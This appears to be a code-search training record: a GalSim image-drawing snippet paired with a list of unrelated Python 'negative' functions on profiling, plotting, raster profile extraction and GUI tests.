galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'], wave_type=bp['wave_type'], throughput=bp['throughput'], zeropoint=bp['zeropoint']) image = prof.drawImage(bandpass=bandpass, **kwargs) except Exception as e: # pragma: no cover logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof) raise return image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def updateSkip(self, prof, image, method, offset, config, base, logger):\n\n # NOTE: There are currently unresolved issues with the image size checking of chromatic\n # objects. For now, we ignore any possible speed increases and skip the check.\n # if isinstance(prof, galsim.ChromaticObject):\n # return False\n\n if prof is not None and base.get('current_image',None) is not None:\n if image is None:\n prof = base['wcs'].toImage(prof, image_pos=base['image_pos'])\n # NOTE: Old version:\n # N = prof.getGoodImageSize(1.)\n if isinstance(prof, galsim.GSObject):\n N = prof.getGoodImageSize(1.)\n elif isinstance(prof, galsim.ChromaticObject):\n # TODO: Finish implementation\n # return False\n pudb.set_trace()\n # Find the suggested image size for each object given the choice of scale, and use the\n # maximum just to be safe.\n print '\\nprof.original = {}'.format(prof.original)\n print '\\nprof.original.obj_list = {}'.format(prof.original.obj_list)\n # print '\\nprof.objlist = {}'.format(prof.original.obj_list)\n obj_list = prof.original.obj_list\n possible_im_sizes = []\n for obj in obj_list:\n print '\\n obj : {}'.format(obj)\n possible_im_sizes.append([ ob.getGoodImageSize(1.) for ob in obj])\n print 'possible_im_sizes : {}'.format(possible_im_sizes)\n N = np.max(possible_im_sizes)\n N += 2 + int(np.abs(offset.x) + np.abs(offset.y))\n bounds = galsim._BoundsI(1,N,1,N)\n else:\n bounds = image.bounds\n\n # Set the origin appropriately\n stamp_center = base['stamp_center']\n if stamp_center:\n bounds = bounds.shift(stamp_center - bounds.center)\n else:\n bounds = bounds.shift(base.get('image_origin',galsim.PositionI(1,1)) -\n galsim.PositionI(bounds.xmin, bounds.ymin))\n\n overlap = bounds & base['current_image'].bounds\n if not overlap.isDefined():\n logger.info('obj %d: skip drawing object because its image will be entirely off '\n 'the main image.', base['obj_num'])\n return True\n\n return False", "def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):\n\n try:\n __import__(\"gobject\")\n from thirdparty.gprof2dot import gprof2dot\n from thirdparty.xdot import xdot\n import gtk\n import pydot\n except ImportError as ex:\n errMsg = \"profiling requires third-party libraries ('%s') \" % getSafeExString(ex)\n errMsg += \"(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')\"\n logger.error(errMsg)\n\n return\n\n if profileOutputFile is None:\n profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.raw\")\n\n if dotOutputFile is None:\n dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.dot\")\n\n if imageOutputFile is None:\n imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, \"sqlmap_profile.png\")\n\n if os.path.exists(profileOutputFile):\n os.remove(profileOutputFile)\n\n if os.path.exists(dotOutputFile):\n os.remove(dotOutputFile)\n\n if os.path.exists(imageOutputFile):\n os.remove(imageOutputFile)\n\n infoMsg = \"profiling the execution into file '%s'\" % profileOutputFile\n logger.info(infoMsg)\n\n # Start sqlmap main function and generate a raw profile file\n cProfile.run(\"start()\", profileOutputFile)\n\n infoMsg = \"converting profile data into a dot file '%s'\" % dotOutputFile\n logger.info(infoMsg)\n\n # Create dot file by using extra/gprof2dot/gprof2dot.py\n # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot\n dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING)\n parser = gprof2dot.PstatsParser(profileOutputFile)\n profile = parser.parse()\n 
profile.prune(0.5 / 100.0, 0.1 / 100.0)\n dot = gprof2dot.DotWriter(dotFilePointer)\n dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP)\n dotFilePointer.close()\n\n infoMsg = \"converting dot file into a graph image '%s'\" % imageOutputFile\n logger.info(infoMsg)\n\n # Create graph image (png) by using pydot (python-pydot)\n # http://code.google.com/p/pydot/\n pydotGraph = pydot.graph_from_dot_file(dotOutputFile)\n\n # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ\n if isinstance(pydotGraph, list):\n pydotGraph = pydotGraph[0]\n\n try:\n pydotGraph.write_png(imageOutputFile)\n except OSError:\n errMsg = \"profiling requires graphviz installed \"\n errMsg += \"(Hint: 'sudo apt-get install graphviz')\"\n logger.error(errMsg)\n else:\n infoMsg = \"displaying interactive graph with xdot library\"\n logger.info(infoMsg)\n\n # Display interactive Graphviz dot file by using extra/xdot/xdot.py\n # http://code.google.com/p/jrfonseca/wiki/XDot\n win = xdot.DotWindow()\n win.connect('destroy', gtk.main_quit)\n win.set_filter(\"dot\")\n win.open_file(dotOutputFile)\n gtk.main()", "def addProfile(self, profile, color=None, close=False):\n if close:\n e1 = profile[0] # should always be a point\n if e1[0] != 0.0:\n profile = [(0.0, e1[1])] + profile\n e2 = profile[-1]\n if e2[0] != 0.0:\n if len(e2) == 2:\n profile.append((0.0, e2[1]))\n else:\n # profile ends in an arc\n profile.append((0.0, e2[0][1]))\n # previous line start x/y, for line -> arc\n px1 = py1 = None\n for e1, e2 in windowItr(profile, 2, 1):\n if e2 is None:\n break\n le1 = len(e1)\n le2 = len(e2)\n # line or start -> line\n if le1 == 2 and le2 == 2:\n x1, y1 = e1\n x2, y2 = e2\n self.blendTangent(False)\n patch = Patch.fromRevLineSeg(x1, y1, x2, y2, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = x1\n py1 = y1\n # line or start -> arc\n elif le1 == 2 and le2 == 3:\n x1, y1 = e1\n (x2, y2), (cx, cy), d = e2\n if px1 is not None:\n self.blendTangent(self._isLineTanToArc(px1, py1, x1, y1,\n cx, cy, d))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx, cy, d, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n # arc -> line\n elif le1 == 3 and le2 == 2:\n (aex, aey), (cx, cy), d = e1\n lex, ley = e2\n self.blendTangent(self._isLineTanToArc(lex, ley, aex, aey, cx,\n cy, d))\n patch = Patch.fromRevLineSeg(aex, aey, lex, ley, self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n px1 = aex\n py1 = aey\n # arc -> arc\n else:\n (x1, y1), (cx1, cy1), d1 = e1\n (x2, y2), (cx2, cy2), d2 = e2\n self.blendTangent(self._isArcTangentToArc(x1, y1, cx1, cy1,\n cx2, cy2))\n patch = Patch.fromRevArcSeg(x1, y1, x2, y2, cx2, cy2, d2,\n self)\n if color:\n patch.setColor(color)\n self._patches.append(patch)\n self._bbox = BBox.fromVertices(self._sharedVertices)", "def testDiagonalProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n # Trigger tool button for diagonal profile mode\n self.toolBar.lineAction.trigger()\n\n # draw profile line\n widget.setFocus(qt.Qt.OtherFocusReason)\n self.mouseMove(widget, pos=pos1)\n self.qWait(100)\n self.mousePress(widget, 
qt.Qt.LeftButton, pos=pos1)\n self.qWait(100)\n self.mouseMove(widget, pos=pos2)\n self.qWait(100)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n self.qWait(100)\n\n manager = self.toolBar.getProfileManager()\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n roi = manager.getCurrentRoi()\n self.assertIsNotNone(roi)\n roi.setProfileLineWidth(3)\n roi.setProfileMethod(method)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n curveItem = roi.getProfileWindow().getCurrentPlotWidget().getAllCurves()[0]\n if method == 'sum':\n self.assertTrue(curveItem.getData()[1].max() > 10000)\n elif method == 'mean':\n self.assertTrue(curveItem.getData()[1].max() < 10000)\n\n # Remove the ROI so the profile window is also removed\n roiManager = manager.getRoiManager()\n roiManager.removeRoi(roi)\n self.qWait(100)", "def prepocessImg(self, method, size, img, bb,offset=0.3,gray=True,\n boundry=False, outputDebug=False,outputprefix=None):\n if method == 'crop':\n crop_img = crop_only(img,bb.left(),bb.top(),bb.width(),bb.height(),offset,size)\n elif method == 'affine':\n img = Image.fromarray(img)\n if self.predictor == None:\n raise Exception(\"Error: method affine should initial with an facepredictor.\")\n alignPoints = self.align(img, bb)\n (xs, ys) = zip(*alignPoints)\n (l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))\n w,h = img.size\n if boundry and (l < 0 or r > w or t < 0 or b > h):\n raise AliError('face out of boundry')\n \n left_eye_l = alignPoints[36]\n left_eye_r = alignPoints[39]\n left_eye = (np.array(left_eye_l)+np.array(left_eye_r))/2\n right_eye_l = alignPoints[42]\n right_eye_r = alignPoints[45]\n right_eye = (np.array(right_eye_l)+np.array(right_eye_r))/2\n crop_img = crop_simi(img,left_eye,right_eye,(offset,offset),(size,size))\n im_buffer = cStringIO.StringIO()\n crop_img.save(im_buffer, format=\"JPEG\")\n im_str = base64.b64encode(im_buffer.getvalue())\n else:\n raise Exception(\"undefined crop method\")\n if gray:\n crop_img = crop_img.convert('L')\n if outputDebug:\n dirname = './aligndebug'\n if not os.path.exists(os.path.abspath(dirname)):\n os.mkdir(dirname)\n drawbox(img,(bb.left(),bb.right(),bb.top(),bb.bottom()))\n if method == 'affine':\n drawpoint(img,left_eye)\n drawpoint(img,right_eye)\n img.save('{}/{}_annotated.jpg'.format(dirname,outputprefix))\n crop_img.save('{}/{}_crop.jpg'.format(dirname,outputprefix))\n crop_img = np.array(crop_img,dtype=np.float32) #look carefully on data format\n if crop_img.ndim == 3: #data shape for caffe\n return crop_img,score\n elif crop_img.ndim == 2:\n bbox = [bb.left(),bb.top(),bb.right(),bb.bottom()]\n return crop_img[:,:,np.newaxis], bbox\n else:\n raise Exception(\"wrong dimension\")", "def set_profile(self, profile='default'):\n\n # parameters used by various subclasses\n # each set is indexed by a name, called a profile\n # Note that each parameter must also be listed in set_params method in order to get set\n self.profile = profile\n self.params = {\n 'default' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [44.,88.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array 
center (vla)\n 'lat': 34.07875 # latitude of the array center (vla)\n },\n 'vlacrab' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [29.,58.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -107.6177, # longitude of the array center\n 'lat': 34.07875 # latitude of the array center\n },\n 'psa' : {\n 'chans': n.array(range(140,150)), # channels to read\n 'dmarr' : [0.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 21.411, # longitude of the array center\n 'lat': -30.721 # latitude of the array center\n },\n 'pocob0329' : {\n 'chans': n.array(range(5,59)), # channels to read\n 'dmarr' : [0, 13.4, 26.8, 40.2, 53.5], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.005, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': -121.470, # longitude of the array center\n 'lat': 40.817 # latitude of the array center\n },\n 'mwa' : {\n 'chans': n.array(n.arange(128)), # channels to read\n 'dmarr' : [0, 50.], # dm values to use for dedispersion (only for some subclasses)\n 'pulsewidth' : 0.0, # width of pulse in time (seconds)\n 'approxuvw' : True, # flag to make template visibility file to speed up writing of dm track data\n 'pathout': './', # place to put output files\n 'beam_params': [0], # flag=0 or list of parameters for twodgaussian parameter definition\n 'long': 116.671, # longitude of the array center\n 'lat': -26.703 # latitude of the array center\n }\n }\n\n \n self.pathout = self.params[self.profile]['pathout']\n self.chans = self.params[self.profile]['chans']\n self.dmarr = self.params[self.profile]['dmarr']\n self.pulsewidth = self.params[self.profile]['pulsewidth'] * n.ones(len(self.chans))\n self.approxuvw = self.params[self.profile]['approxuvw']\n self.beam_params = self.params[self.profile]['beam_params']\n self.long = self.params[self.profile]['long']\n self.lat = self.params[self.profile]['lat']", "def tool_draw_point(self,img,point,color=[0,0,0]):\n def s(pos):\n return int((pos + 1) / 2 * 128)\n if point is None:\n print(\"Warn: tool_draw_point Fail => point is None\")\n return img\n x, y = s(point[0]), s(point[1])\n img = cv2.rectangle(img, (x, y), (x, y), color, 5)\n return img", "def plot_profile(outdir, xval='x', xscale=1, yscale=1, comp2los=False, adjustRadial=False,\n fig=True):\n #Load data\n path = os.path.join(outdir,'points.h5')\n x,y,z,ux,uy,uz = pu.extract_points(path)\n\n Y = uz / yscale\n if xval == 'x':\n X = x / xscale\n Y1 = ux / yscale\n elif xval == 'r':\n X = np.hypot(x,y) / xscale\n ur = np.hypot(ux,uy)\n Y1 = ur / yscale\n if adjustRadial: #fix sign from hypot square root\n ur = pu.radial2negative(Y1)\n\n if fig:\n plt.figure()\n # otherwise profile 
added to active plot\n\n #plt.plot(X,uy/yscale,'r.-',label='Uy') #should be zero along EW axis\n de = 90e3 / xscale #eastern data extent\n if comp2los != False:\n data_extents = (X<=de)\n if comp2los == 'west': #switch sign of radial profile\n #ux = -ux #move to comp2los function\n X = -X\n Y1 = -Y1\n de = -de\n data_extents = (X>=de)\n\n los = pu.comp2los(x,ux,uy,uz,track=comp2los)\n plt.plot(X, los/yscale, 'k-', lw=2, label='Ulos_' + comp2los)\n plt.fill_between(X,los/yscale, where=data_extents, color='gray',alpha=0.5)\n\n plt.plot(X, Y, 'b-', lw=2, label='Uz')\n plt.plot(X, Y1, 'b--',lw=2, mfc='None',label='U{0}'.format(xval))\n\n # Annotate\n plt.title(outdir)\n plt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n plt.ylabel('Uz [{}]'.format(get_unit(yscale)))\n plt.axhline(color='k')\n plt.axvline(de,color='k', linestyle='dashed', label='EW data extent') #EW extent of InSAR coverage\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()", "def profile(self, profile):\n\n self.width = profile['width']\n self.height = profile['height']\n self.crs = profile['crs']\n self.interleave = profile['interleave']\n self.resampling = profile['resampling']", "def writeProfile(fname,prof):\n t = np.linspace(0,1,prof.shape[0],endpoint=False)\n fh = open(fname,'w')\n for x in range(prof.shape[0]):\n fh.write('%.7e %.7e\\n' % (t[x],prof[x]))\n fh.close()", "def paintAvatar(self):\n self.paintBody()\n self.paintShoes()\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n self.paintShirt()\n self.paintTrousers()\n else:\n self.paintSkirt()\n self.paintHead()\n self.paintHair()\n self.paintMask()", "def CreateProfileLikelihoodPlot(model, data, poi):\n\n nll = model.createNLL(data);\n profile = nll.createProfile(ROOT.RooArgSet(poi)); \n\n frame = poi.frame();\n ROOT.RooStats.HistFactory.FormatFrameForLikelihood(frame)\n\n nll.plotOn(frame, ROOT.RooCmdArg(\"ShiftToZero\",True), \n ROOT.RooCmdArg(\"LineColor\",ROOT.kRed), \n ROOT.RooCmdArg(\"LineStyle\",ROOT.kDashed) );\n profile.plotOn(frame);\n frame.SetMinimum(0);\n frame.SetMaximum(2.);\n canvas = ROOT.TCanvas( \"Profile Likelihood\", \"\", 800,600);\n frame.Draw(\"goff\");\n png_string = CanvasToPngString(canvas)\n return png_string", "def PlotProfile():\n (metadata, data) = Parse('/tmp/sdcard-scalability.txt')\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp('set pointsize 2')\n gp.clear()\n gp.xlabel('writer process')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n\n dataset = data[0]\n x = numpy.array(dataset.time, dtype='int_')\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='linespoints')\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def _atexit_print_fn():\n if config.profile:\n to_sum = []\n\n if config.profiling__destination == \"stderr\":\n destination_file = \"<stderr>\"\n elif config.profiling__destination == \"stdout\":\n destination_file = \"<stdout>\"\n else:\n destination_file = config.profiling__destination\n\n with extended_open(destination_file, mode=\"w\"):\n # Reverse sort in the order of compile+exec time\n for ps in sorted(\n _atexit_print_list, key=lambda a: a.compile_time + a.fct_call_time\n )[::-1]:\n if (\n ps.fct_callcount >= 1\n or ps.compile_time > 1\n or getattr(ps, \"callcount\", 0) > 1\n ):\n ps.summary(\n file=destination_file,\n n_ops_to_print=config.profiling__n_ops,\n n_apply_to_print=config.profiling__n_apply,\n )\n\n if ps.show_sum:\n 
to_sum.append(ps)\n            else:\n                # TODO print the name if there is one!\n                print(\"Skipping empty Profile\")\n        if len(to_sum) > 1:\n            # Make a global profile\n            cum = copy.copy(to_sum[0])\n            msg = f\"Sum of all({len(to_sum)}) printed profiles at exit.\"\n            cum.message = msg\n            for ps in to_sum[1:]:\n                for attr in [\n                    \"compile_time\",\n                    \"fct_call_time\",\n                    \"fct_callcount\",\n                    \"vm_call_time\",\n                    \"rewriter_time\",\n                    \"linker_time\",\n                    \"validate_time\",\n                    \"import_time\",\n                    \"linker_node_make_thunks\",\n                ]:\n                    setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\n\n                # merge dictionary\n                for attr in [\n                    \"apply_time\",\n                    \"apply_callcount\",\n                    \"apply_cimpl\",\n                    \"variable_shape\",\n                    \"variable_strides\",\n                    \"variable_offset\",\n                    \"linker_make_thunk_time\",\n                ]:\n                    cum_attr = getattr(cum, attr)\n                    for key, val in getattr(ps, attr).items():\n                        assert key not in cum_attr, (key, cum_attr)\n                        cum_attr[key] = val\n\n                if cum.rewriter_profile and ps.rewriter_profile:\n                    try:\n                        merge = cum.rewriter_profile[0].merge_profile(\n                            cum.rewriter_profile[1], ps.rewriter_profile[1]\n                        )\n                        assert len(merge) == len(cum.rewriter_profile[1])\n                        cum.rewriter_profile = (cum.rewriter_profile[0], merge)\n                    except Exception as e:\n                        print(e)\n                        cum.rewriter_profile = None\n                else:\n                    cum.rewriter_profile = None\n\n            cum.summary(\n                file=destination_file,\n                n_ops_to_print=config.profiling__n_ops,\n                n_apply_to_print=config.profiling__n_apply,\n            )\n\n    if config.print_global_stats:\n        print_global_stats()

def mark_person(snap, annot, switch_format=True):\n    frame = cv2.imread(snap)\n    height, width, _ = frame.shape\n\n    iTL = 0\n    iBR = 2\n    TL = (int(annot.bounding_poly.normalized_vertices[iTL].x * width),\n          int(annot.bounding_poly.normalized_vertices[iTL].y * height))\n    BR = (int(annot.bounding_poly.normalized_vertices[iBR].x * width),\n          int(annot.bounding_poly.normalized_vertices[iBR].y * height))\n    \n    print(f\"Drawing from {TL} to {BR}\")\n\n    color = (0, 0, 255)\n    thickness = 2\n    frame = cv2.rectangle(frame, TL, BR, color, thickness)\n    if switch_format:\n        snap = snap.replace(\"png\", \"jpeg\")\n    cv2.imwrite(snap, frame)\n    return snap

def testAlignedProfile(self):\n        # Use Plot backend widget to submit mouse events\n        widget = self.plot.getWidgetHandle()\n        for method in ('sum', 'mean'):\n            with self.subTest(method=method):\n                # 2 positions to use for mouse events\n                pos1 = widget.width() * 0.4, widget.height() * 0.4\n                pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n                for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n                    with self.subTest(mode=action.text()):\n                        # Trigger tool button for mode\n                        action.trigger()\n                        # Without image\n                        self.mouseMove(widget, pos=pos1)\n                        self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n                        # with image\n                        self.plot.addImage(\n                            numpy.arange(100 * 100).reshape(100, -1))\n                        self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n                        self.mouseMove(widget, pos=pos2)\n                        self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n                        self.mouseMove(widget)\n                        self.mouseClick(widget, qt.Qt.LeftButton)\n\n                        manager = self.toolBar.getProfileManager()\n                        for _ in range(20):\n                            self.qWait(200)\n                            if not manager.hasPendingOperations():\n                                break

def draw(self, base, level):\n\n        a = base.a\n        b = base.b\n\n        if level > 0:\n            delta = base.b - base.a\n            px = a.x + delta.x / 3\n            py = a.y + delta.y / 3\n            rx = a.x + 2 * delta.x / 3\n            ry = a.y + 2 * delta.y / 3\n            p = Point(px, py)\n            r = Point(rx, ry)\n            q = Point(rx, ry)\n            q.rotate_deg(60, p)\n            self.draw(Line(a,p), level-1)\n            self.draw(Line(p,q), level-1)\n            self.draw(Line(q,r), 
level-1)\n self.draw(Line(r,b), level-1)\n else:\n self.container.window.create_line(a.x, a.y, b.x, b.y)", "def make_lineprofile(npix,rstar,xc,vgrid,A,veq,linewidth):\n vc=(np.arange(npix)-xc)/rstar*veq\n vs=vgrid[np.newaxis,:]-vc[:,np.newaxis]\n profile=1.-A*np.exp( -(vs*vs)/2./linewidth**2)\n return profile", "def extract_profile(tif, line_file, ds):\r\n\r\n import numpy as np\r\n import gdal\r\n import fiona\r\n from scipy.interpolate import interp1d\r\n# from scipy.interpolate import interp2d\r\n from scipy.ndimage import map_coordinates\r\n \r\n #%% Create evenly spaced points\r\n # Read coordinates of the profile line from shapefile\r\n fiona_obj = fiona.open(line_file)\r\n# line = fiona_obj.next()\r\n line = iter(fiona_obj).next() # this line is proper syntax for fiona v2. Corrected on Mar 12, 2021 by TCB\r\n coords = np.array( line['geometry']['coordinates'] ) # m the easting and northing coordinates of the vertices along the shapefile\r\n \r\n sqrd_deltas = np.diff(coords, axis=0)**2 # squared differences between x and y coordinates\r\n deltas = np.sum(sqrd_deltas, axis=1)**0.5 # m straight-line path length between adjacent points in the shapefile\r\n dist = np.cumsum( np.append(0, deltas) ) # m running distance along the shapefile from one end.\r\n \r\n disti = np.arange(dist[0], dist[-1], ds) # m vector of evenly spaced distances along the shapefile,\r\n # equivalent to an evenly spaced version of dist\r\n xi = interp1d(dist, coords[:,0])(disti) # m the easting coordinates of disti points, at which profile will be extracted\r\n yi = interp1d(dist, coords[:,1])(disti) # m the northing coordinates of disti points, at which profile will be extracted\r\n\r\n #%% Manipulate the raster and extract its data\r\n # ---- dimensions of geotiff\r\n gtif = gdal.Open(tif)\r\n xmin,xres,xskew,ymax,yskew,yres = gtif.GetGeoTransform()\r\n\r\n\r\n # convert the profile coordinates into pixel coordinates\r\n px = (xi - xmin) / xres\r\n py = (yi - ymax) / yres\r\n# px = np.round(col).astype(int)\r\n# py = np.round(row).astype(int)\r\n \r\n \r\n # pull out the array of raster data. Data are assumed to be in band 1.\r\n gtif_data = gtif.GetRasterBand(1).ReadAsArray()\r\n# gtif_data = band.ReadAsArray()px,py, 1, 1)\r\n \r\n # Two early versions of extacting the data:\r\n # profile = map_coordinates(gtif_data,[px,py],order=0,cval=np.nan)\r\n # profile = interp2d(np.arange(gtif_data.shape[1]), np.arange(gtif_data.shape[0]), \r\n # gtif_data)(px, py)\r\n\r\n # Interpolate within gtif_data at given pixel coordinates to identify values from the geotiff \r\n # Uses a 1st order spline interpolant to extract estimated values of\r\n # gtif_data at the (non-integer) pixel values px and py.\r\n # Function returns `cval' at undefined values of gtif_data.\r\n profile = map_coordinates(gtif_data, np.vstack((py, px)),\r\n order=1, cval=np.nan)\r\n \r\n# profile = np.array(profile,dtype=float)\r\n if type(profile[0]) == float:\r\n profile[np.abs(profile) == 9999] = np.nan\r\n \r\n return disti, profile", "def draw(self, prev_draw):\n # Std deviations for each parameter, the mean is the current location\n # strike = .375\n # length = 4.e3\n # width = 3.e3\n # depth = .1875\n # slip = .01\n # rake = .25\n # dip = .0875\n # longitude = .025\n # latitude = .01875\n strike_std = 5. 
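# A minimal, self-contained sketch of the mean-zero Gaussian random-walk
# proposal used by draw(): a diagonal covariance is built from per-parameter
# standard deviations, scaled down, and a sampled step is added to the
# previous draw. The helper name and the example std values below are
# illustrative assumptions, not part of the original module.
import numpy as np
from scipy import stats

def random_walk_step(prev_draw, stds, scale=0.25):
    """Propose prev_draw + e with e ~ N(0, scale * diag(stds**2))."""
    cov = scale * np.diag(np.square(stds))
    return prev_draw + stats.multivariate_normal(np.zeros(len(stds)), cov).rvs()

# Example: nine fault parameters with hypothetical standard deviations.
new_draw_example = random_walk_step(
    np.zeros(9), np.array([5.0, 5e3, 2e3, 1e3, 0.5, 0.5, 0.1, 0.15, 0.15]))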
# strike_std = 1.\n length_std = 5.e3 # length_std = 2.e4\n width_std = 2.e3 # width_std = 1.e4\n depth_std = 1.e3 # depth_std = 2.e3\n slip_std = 0.5 # slip_std = 0.5\n rake_std = 0.5 # rake_std = 0.5\n dip_std = 0.1 # dip_std = 0.1\n longitude_std = 0.15 # longitude_std = .025\n latitude_std = 0.15 # latitude_std = .025\n mean = np.zeros(9)\n # square for std => cov\n cov = np.diag(np.square([strike_std, length_std, width_std, depth_std, slip_std, rake_std,\n dip_std, longitude_std, latitude_std]))\n\n cov *= 0.25;\n\n # random draw from normal distribution\n e = stats.multivariate_normal(mean, cov).rvs()\n\n # does sample update normally\n print(\"Random walk difference:\", e)\n print(\"New draw:\", prev_draw + e)\n new_draw = prev_draw + e\n\n \"\"\"\n Here we make some fixed changes to the dip and depth according \n to a simple rule documented elsewhere. This fix will likely\n depreciate upon finishing proof of concept paper and work on 1852\n event.\n \"\"\"\n # doctor dip to 20 degrees as discussed\n new_draw[6] = 20\n # doctor depth according to adhoc fix\n new_draw[3] = self.doctored_depth_1852_adhoc(new_draw[7], new_draw[8], new_draw[6])\n\n # return appropriately doctored draw\n return new_draw", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def merge_profile(prof1, prof2):\r\n new_t = []\r\n new_l = []\r\n new_sub_profile = []\r\n #merge common(same object) opt\r\n for l in set(prof1[0]).intersection(set(prof2[0])):\r\n idx1 = prof1[0].index(l)\r\n idx2 = prof2[0].index(l)\r\n new_t.append(prof1[1][idx1] +\r\n prof2[1][idx2])\r\n new_l.append(l)\r\n if hasattr(l, 'merge_profile'):\r\n assert len(prof1[6][idx1]) == len(prof2[6][idx2])\r\n new_sub_profile.append(l.merge_profile(prof1[6][idx1],\r\n prof2[6][idx2]))\r\n else:\r\n new_sub_profile.append(None)\r\n\r\n # merge not common opt\r\n from theano.compat.six import StringIO\r\n for l in set(prof1[0]).symmetric_difference(set(prof2[0])):\r\n #The set trick above only work for the same object optimization\r\n #It don't work for equivalent optimization.\r\n #So we try to merge equivalent optimization here.\r\n new_l_names = [o.name for o in new_l]\r\n if l.name in new_l_names:\r\n idx = new_l_names.index(l.name)\r\n io1 = StringIO()\r\n io2 = StringIO()\r\n l.print_summary(io1)\r\n new_l[idx].print_summary(io2)\r\n if io1.read() == io2.read():\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t[idx] += p[1][p[0].index(l)]\r\n if hasattr(l, 'merge_profile'):\r\n assert len(p[6][p[0].index(l)]) == \\\r\n len(new_sub_profile[idx])\r\n new_sub_profile[idx] = l.merge_profile(\r\n new_sub_profile[idx], p[6][p[0].index(l)])\r\n else:\r\n new_sub_profile[idx] = None\r\n continue\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t.append(p[1][p[0].index(l)])\r\n idx = p[0].index(l)\r\n new_l.append(l)\r\n new_sub_profile.append(p[6][idx])\r\n\r\n new_opt = SeqOptimizer(*new_l)\r\n #We need to 
